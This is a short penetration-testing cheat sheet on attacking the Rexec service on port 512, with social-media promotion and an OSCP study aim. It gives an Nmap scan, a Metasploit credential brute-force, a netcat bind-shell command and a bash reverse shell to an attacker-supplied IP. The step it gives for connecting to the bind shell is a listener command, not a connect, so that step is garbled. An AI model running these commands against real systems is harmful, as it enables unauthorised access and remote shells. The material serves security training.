Rexec - Port 512
It is a service that allows you to execute a command inside a host if you know valid credentials (username and password).
Become VeryLazyTech member! π
Follow us on:
β Twitter @VeryLazyTech.
πΎ Github @VeryLazyTech.
π Medium @VeryLazyTech.
πΊ YouTube @VeryLazyTech.
π© Telegram @VeryLazyTech.
π΅οΈββοΈ My Site @VeryLazyTech.
Visit our shop for e-books and courses. π
Basic Info
It is a service that allows you to execute a command inside a host if you know valid credentials (username and password).
Default Port: 512
PORT STATE SERVICE
512/tcp open exec
Scanning for Hosts
Start by using Nmap to scan for hosts with port 512 open, which is the default port for Rexec:
nmap -sT -p 512 <target_ip_range>
This will help identify potential targets with the Rexec service running.
Brute-Forcing Credentials
Use Metasploit's auxiliary/scanner/rservices/rexec_login module to brute-force username and password combinations:
Load the module:
use auxiliary/scanner/rservices/rexec_login
Set the target and options, such as username and password files:
set RHOSTS <target_ip>
set USER_FILE /path/to/usernames.txt
set PASS_FILE /path/to/passwords.txt
run
This will attempt to find valid credentials, exploiting Rexec's clear-text password vulnerability.
Exploiting with Command Execution
Once credentials are obtained, use the rexec command to execute a backdoor command. For example, start a netcat listener:
rexec -l username -p password rhost "nc -l -p 1234 -e /bin/bash"
Then, connect to the backdoor:
nc -lnvp 1234
Alternatively, set up a reverse shell:
rexec -l username -p password rhost "bash -c 'bash -i >& /dev/tcp/<your_ip>/<your_port> 0>&1'"
Learn & practice For the OSCP.
Last updated
Was this helpful?